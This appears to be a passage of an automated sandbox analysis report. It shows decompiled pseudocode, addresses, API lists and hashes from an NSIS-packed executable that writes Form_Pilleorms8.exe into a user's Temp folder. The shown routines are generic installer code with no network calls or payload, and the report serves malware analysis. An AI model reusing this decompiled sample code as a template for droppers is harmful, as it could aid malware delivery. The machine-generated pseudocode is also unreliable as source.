                        							_t99 = _a16;
                        						}
                        						if(E004034CF(0x41ea20, _t99) == 0) {
                        							goto L41;
                        						}
                        						_a16 = _a16 - _t99;
                        						 *0x40ce58 = 0x41ea20;
                        						 *0x40ce5c = _t99;
                        						while(1) {
                        							_t95 = _v16;
                        							 *0x40ce60 = _t95;
                        							 *0x40ce64 = _v12;
                        							_t75 = E00406A65(0x40ce58);
                        							_v24 = _t75;
                        							if(_t75 < 0) {
                        								break;
                        							}
                        							_t101 =  *0x40ce60 - _t95;
                        							_t76 = GetTickCount();
                        							_t96 = _t76;
                        							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                        								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                        								_t102 = _t102 + 0xc;
                        								E0040559F(0,  &_v152);
                        								_v20 = _t96;
                        							}
                        							if(_t101 == 0) {
                        								if(_a16 > 0) {
                        									goto L9;
                        								}
                        								goto L44;
                        							} else {
                        								if(_a12 != 0) {
                        									_v8 = _v8 + _t101;
                        									_v12 = _v12 - _t101;
                        									_v16 =  *0x40ce60;
                        									L23:
                        									if(_v24 != 1) {
                        										continue;
                        									}
                        									goto L44;
                        								}
                        								_t78 = E004060DF(_a8, _v16, _t101); // executed
                        								if(_t78 == 0) {
                        									goto L28;
                        								}
                        								_v8 = _v8 + _t101;
                        								goto L23;
                        							}
                        						}
                        						_push(0xfffffffc);
                        						goto L42;
                        					}
                        					goto L41;
                        				}
                        			}























                        0x004032bf
                        0x004032c3
                        0x004032c6
                        0x004032cb
                        0x004032cd
                        0x004032cd
                        0x004032d4
                        0x004032d8
                        0x004032dd
                        0x004032df
                        0x004032df
                        0x004032e6
                        0x004032eb
                        0x004032f6
                        0x004032f6
                        0x00403308
                        0x004034bd
                        0x004034bd
                        0x00000000
                        0x0040330e
                        0x00403312
                        0x0040346a
                        0x004034ad
                        0x004034af
                        0x004034af
                        0x004034bb
                        0x004034c2
                        0x004034c5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004034bb
                        0x0040346f
                        0x00000000
                        0x00000000
                        0x00403471
                        0x00403474
                        0x00403477
                        0x0040347a
                        0x0040347c
                        0x0040347c
                        0x0040348c
                        0x00000000
                        0x00000000
                        0x0040349a
                        0x00403464
                        0x00403464
                        0x004034bf
                        0x004034bf
                        0x00000000
                        0x004034bf
                        0x0040349c
                        0x0040349f
                        0x004034a6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004034a8
                        0x00000000
                        0x00403474
                        0x0040331e
                        0x00403320
                        0x00403327
                        0x0040332e
                        0x0040332e
                        0x00403335
                        0x0040333d
                        0x00403347
                        0x0040334c
                        0x00403354
                        0x0040335e
                        0x00403361
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403367
                        0x00403367
                        0x00403367
                        0x0040336f
                        0x00403371
                        0x00403371
                        0x00403382
                        0x00000000
                        0x00000000
                        0x00403388
                        0x0040338b
                        0x00403391
                        0x00403397
                        0x00403397
                        0x004033a2
                        0x004033a8
                        0x004033ad
                        0x004033b4
                        0x004033b7
                        0x00000000
                        0x00000000
                        0x004033c3
                        0x004033c5
                        0x004033ce
                        0x004033d0
                        0x00403401
                        0x00403407
                        0x00403413
                        0x00403418
                        0x00403418
                        0x0040341d
                        0x00403458
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040341f
                        0x00403423
                        0x0040343f
                        0x00403442
                        0x00403445
                        0x00403448
                        0x0040344c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403452
                        0x0040342c
                        0x00403433
                        0x00000000
                        0x00000000
                        0x00403435
                        0x00000000
                        0x00403435
                        0x0040341d
                        0x00403460
                        0x00000000
                        0x00403460
                        0x00000000
                        0x00403367

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CountTick$wsprintf
                        • String ID: *B$ A$ A$... %d%%$}8@
                        • API String ID: 551687249-3029848762
                        • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                        • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                        • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                        • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                        				void* __esi;
                        				void* _t35;
                        				void* _t43;
                        				void* _t45;
                        				FILETIME* _t51;
                        				FILETIME* _t64;
                        				void* _t66;
                        				signed int _t72;
                        				FILETIME* _t73;
                        				FILETIME* _t77;
                        				signed int _t79;
                        				WCHAR* _t81;
                        				void* _t83;
                        				void* _t84;
                        				void* _t86;
                        
                        				_t77 = __ebx;
                        				 *(_t86 - 8) = E00402DA6(0x31);
                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                        				_t35 = E00405E83( *(_t86 - 8));
                        				_push( *(_t86 - 8));
                        				_t81 = L"C:\\Users";
                        				if(_t35 == 0) {
                        					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                        				} else {
                        					E0040653D();
                        				}
                        				E004067C4(_t81);
                        				while(1) {
                        					__eflags =  *(_t86 + 8) - 3;
                        					if( *(_t86 + 8) >= 3) {
                        						_t66 = E00406873(_t81);
                        						_t79 = 0;
                        						__eflags = _t66 - _t77;
                        						if(_t66 != _t77) {
                        							_t73 = _t66 + 0x14;
                        							__eflags = _t73;
                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                        						}
                        						asm("sbb eax, eax");
                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                        						__eflags = _t72;
                        						 *(_t86 + 8) = _t72;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) == _t77) {
                        						E00406008(_t81);
                        					}
                        					__eflags =  *(_t86 + 8) - 1;
                        					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                        					__eflags = _t43 - 0xffffffff;
                        					 *(_t86 - 0x38) = _t43;
                        					if(_t43 != 0xffffffff) {
                        						break;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) != _t77) {
                        						E0040559F(0xffffffe2,  *(_t86 - 8));
                        						__eflags =  *(_t86 + 8) - 2;
                        						if(__eflags == 0) {
                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                        						}
                        						L31:
                        						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                        						__eflags =  *0x434f88;
                        						goto L32;
                        					} else {
                        						E0040653D(0x40b5f0, _t83);
                        						E0040653D(_t83, _t81);
                        						E0040657A(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                        						E0040653D(_t83, 0x40b5f0);
                        						_t64 = E00405B9D("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                        						__eflags = _t64;
                        						if(_t64 == 0) {
                        							continue;
                        						} else {
                        							__eflags = _t64 == 1;
                        							if(_t64 == 1) {
                        								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                        								L32:
                        								_t51 = 0;
                        								__eflags = 0;
                        							} else {
                        								_push(_t81);
                        								_push(0xfffffffa);
                        								E0040559F();
                        								L29:
                        								_t51 = 0x7fffffff;
                        							}
                        						}
                        					}
                        					L33:
                        					return _t51;
                        				}
                        				E0040559F(0xffffffea,  *(_t86 - 8));
                        				 *0x434fb4 =  *0x434fb4 + 1;
                        				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                        				 *0x434fb4 =  *0x434fb4 - 1;
                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                        				_t84 = _t45;
                        				if( *(_t86 - 0x24) != 0xffffffff) {
                        					L22:
                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                        				} else {
                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                        						goto L22;
                        					}
                        				}
                        				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                        				__eflags = _t84 - _t77;
                        				if(_t84 >= _t77) {
                        					goto L31;
                        				} else {
                        					__eflags = _t84 - 0xfffffffe;
                        					if(_t84 != 0xfffffffe) {
                        						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                        					} else {
                        						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                        						lstrcatW(_t81,  *(_t86 - 8));
                        					}
                        					_push(0x200010);
                        					_push(_t81);
                        					E00405B9D();
                        					goto L29;
                        				}
                        				goto L33;
                        			}


















                        0x0040176f
                        0x00401776
                        0x00401782
                        0x00401785
                        0x0040178a
                        0x0040178d
                        0x00401794
                        0x004017b0
                        0x00401796
                        0x00401797
                        0x00401797
                        0x004017b6
                        0x004017bb
                        0x004017bb
                        0x004017bf
                        0x004017c2
                        0x004017c7
                        0x004017c9
                        0x004017cb
                        0x004017d0
                        0x004017d0
                        0x004017db
                        0x004017db
                        0x004017ec
                        0x004017ee
                        0x004017ee
                        0x004017ef
                        0x004017ef
                        0x004017f2
                        0x004017f5
                        0x004017f8
                        0x004017f8
                        0x004017ff
                        0x0040180e
                        0x00401813
                        0x00401816
                        0x00401819
                        0x00000000
                        0x00000000
                        0x0040181b
                        0x0040181e
                        0x00401874
                        0x00401879
                        0x004015b6
                        0x0040292e
                        0x0040292e
                        0x00402c2a
                        0x00402c2d
                        0x00402c2d
                        0x00000000
                        0x00401820
                        0x00401826
                        0x0040182d
                        0x0040183a
                        0x00401845
                        0x0040185b
                        0x0040185b
                        0x0040185e
                        0x00000000
                        0x00401864
                        0x00401864
                        0x00401865
                        0x00401882
                        0x00402c33
                        0x00402c33
                        0x00402c33
                        0x00401867
                        0x00401867
                        0x00401868
                        0x00401493
                        0x0040239d
                        0x0040239d
                        0x0040239d
                        0x00401865
                        0x0040185e
                        0x00402c35
                        0x00402c39
                        0x00402c39
                        0x00401892
                        0x00401897
                        0x004018a5
                        0x004018aa
                        0x004018b0
                        0x004018b4
                        0x004018b6
                        0x004018be
                        0x004018ca
                        0x004018b8
                        0x004018b8
                        0x004018bc
                        0x00000000
                        0x00000000
                        0x004018bc
                        0x004018d3
                        0x004018d9
                        0x004018db
                        0x00000000
                        0x004018e1
                        0x004018e1
                        0x004018e4
                        0x004018fc
                        0x004018e6
                        0x004018e9
                        0x004018f2
                        0x004018f2
                        0x00401901
                        0x00401906
                        0x00402398
                        0x00000000
                        0x00402398
                        0x00000000

                        APIs
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                        • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                          • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,73BCEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,73BCEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                          • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                          • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                          • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                        • API String ID: 1941528284-2017659191
                        • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                        • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                        • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                        • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040689A(intOrPtr _a4) {
                        				short _v576;
                        				signed int _t13;
                        				struct HINSTANCE__* _t17;
                        				signed int _t19;
                        				void* _t24;
                        
                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                        				if(_t13 > 0x104) {
                        					_t13 = 0;
                        				}
                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                        					_t19 = 1;
                        				} else {
                        					_t19 = 0;
                        				}
                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                        				return _t17;
                        			}








                        0x004068b1
                        0x004068ba
                        0x004068bc
                        0x004068bc
                        0x004068c0
                        0x004068d3
                        0x004068cd
                        0x004068cd
                        0x004068cd
                        0x004068ec
                        0x00406900
                        0x00406907

                        APIs
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                        • wsprintfW.USER32 ref: 004068EC
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%S.dll$UXTHEME$\
                        • API String ID: 2200240437-1946221925
                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                        • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                        • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E00401C43(intOrPtr __edx) {
                        				int _t29;
                        				long _t30;
                        				signed int _t32;
                        				WCHAR* _t35;
                        				long _t36;
                        				int _t41;
                        				signed int _t42;
                        				int _t46;
                        				int _t56;
                        				intOrPtr _t57;
                        				struct HWND__* _t63;
                        				void* _t64;
                        
                        				_t57 = __edx;
                        				_t29 = E00402D84(3);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 - 0x18) = _t29;
                        				_t30 = E00402D84(4);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 + 8) = _t30;
                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                        				}
                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                        					 *(_t64 + 8) = E00402DA6(0x44);
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                        				_push(1);
                        				if(__eflags != 0) {
                        					_t61 = E00402DA6();
                        					_t32 = E00402DA6();
                        					asm("sbb ecx, ecx");
                        					asm("sbb eax, eax");
                        					_t35 =  ~( *_t31) & _t61;
                        					__eflags = _t35;
                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                        					goto L10;
                        				} else {
                        					_t63 = E00402D84();
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t41 = E00402D84(2);
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t56 =  *(_t64 - 0x1c) >> 2;
                        					if(__eflags == 0) {
                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                        						L10:
                        						 *(_t64 - 0x38) = _t36;
                        					} else {
                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                        						asm("sbb eax, eax");
                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                        					}
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                        					_push( *(_t64 - 0x38));
                        					E00406484();
                        				}
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                        				return 0;
                        			}















                        0x00401c43
                        0x00401c45
                        0x00401c4c
                        0x00401c4f
                        0x00401c52
                        0x00401c5c
                        0x00401c60
                        0x00401c63
                        0x00401c6c
                        0x00401c6c
                        0x00401c6f
                        0x00401c73
                        0x00401c7c
                        0x00401c7c
                        0x00401c7f
                        0x00401c83
                        0x00401c85
                        0x00401cda
                        0x00401cdc
                        0x00401ce7
                        0x00401cf1
                        0x00401cf4
                        0x00401cf4
                        0x00401cfd
                        0x00000000
                        0x00401c87
                        0x00401c8e
                        0x00401c90
                        0x00401c93
                        0x00401c99
                        0x00401ca0
                        0x00401ca3
                        0x00401ccb
                        0x00401d03
                        0x00401d03
                        0x00401ca5
                        0x00401cb3
                        0x00401cbb
                        0x00401cbe
                        0x00401cbe
                        0x00401ca3
                        0x00401d06
                        0x00401d09
                        0x00401d0f
                        0x00402ba4
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                        • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                        • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                        • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                        				intOrPtr _v8;
                        				short _v12;
                        				short _t12;
                        				intOrPtr _t13;
                        				signed int _t14;
                        				WCHAR* _t17;
                        				signed int _t19;
                        				signed short _t23;
                        				WCHAR* _t26;
                        
                        				_t26 = _a4;
                        				_t23 = 0x64;
                        				while(1) {
                        					_t12 =  *L"nsa"; // 0x73006e
                        					_t23 = _t23 - 1;
                        					_v12 = _t12;
                        					_t13 =  *0x40a57c; // 0x61
                        					_v8 = _t13;
                        					_t14 = GetTickCount();
                        					_t19 = 0x1a;
                        					_v8 = _v8 + _t14 % _t19;
                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                        					if(_t17 != 0) {
                        						break;
                        					}
                        					if(_t23 != 0) {
                        						continue;
                        					} else {
                        						 *_t26 =  *_t26 & _t23;
                        					}
                        					L4:
                        					return _t17;
                        				}
                        				_t17 = _t26;
                        				goto L4;
                        			}












                        0x00406062
                        0x00406068
                        0x00406069
                        0x00406069
                        0x0040606e
                        0x0040606f
                        0x00406072
                        0x00406077
                        0x0040607a
                        0x00406084
                        0x00406091
                        0x00406095
                        0x0040609d
                        0x00000000
                        0x00000000
                        0x004060a1
                        0x00000000
                        0x004060a3
                        0x004060a3
                        0x004060a3
                        0x004060a6
                        0x004060a9
                        0x004060a9
                        0x004060ac
                        0x00000000

                        APIs
                        • GetTickCount.KERNEL32 ref: 0040607A
                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-678247507
                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                        • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                        • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E004015C1(short __ebx, void* __eflags) {
                        				void* _t17;
                        				int _t23;
                        				void* _t25;
                        				signed char _t26;
                        				short _t28;
                        				short _t31;
                        				short* _t34;
                        				void* _t36;
                        
                        				_t28 = __ebx;
                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                        				_t17 = E00405EB7(_t16);
                        				_t32 = _t17;
                        				if(_t17 != __ebx) {
                        					do {
                        						_t34 = E00405E39(_t32, 0x5c);
                        						_t31 =  *_t34;
                        						 *_t34 = _t28;
                        						if(_t31 != _t28) {
                        							L5:
                        							_t25 = E00405AEB( *(_t36 + 8));
                        						} else {
                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                        								goto L5;
                        							} else {
                        								_t25 = E00405A6E( *(_t36 + 8));
                        							}
                        						}
                        						if(_t25 != _t28) {
                        							if(_t25 != 0xb7) {
                        								L9:
                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        							} else {
                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                        								if((_t26 & 0x00000010) == 0) {
                        									goto L9;
                        								}
                        							}
                        						}
                        						 *_t34 = _t31;
                        						_t32 = _t34 + 2;
                        					} while (_t31 != _t28);
                        				}
                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                        					_push(0xfffffff5);
                        					E00401423();
                        				} else {
                        					E00401423(0xffffffe6);
                        					E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                        					if(_t23 == 0) {
                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        					}
                        				}
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                        				return 0;
                        			}











                        0x004015c1
                        0x004015c9
                        0x004015cc
                        0x004015d1
                        0x004015d5
                        0x004015d7
                        0x004015df
                        0x004015e1
                        0x004015e4
                        0x004015ea
                        0x00401604
                        0x00401607
                        0x004015ec
                        0x004015ec
                        0x004015ef
                        0x00000000
                        0x004015fa
                        0x004015fd
                        0x004015fd
                        0x004015ef
                        0x0040160e
                        0x00401615
                        0x00401624
                        0x00401624
                        0x00401617
                        0x0040161a
                        0x00401622
                        0x00000000
                        0x00000000
                        0x00401622
                        0x00401615
                        0x00401627
                        0x0040162b
                        0x0040162c
                        0x004015d7
                        0x00401634
                        0x00401663
                        0x004022f1
                        0x00401636
                        0x00401638
                        0x00401645
                        0x0040164d
                        0x00401655
                        0x0040165b
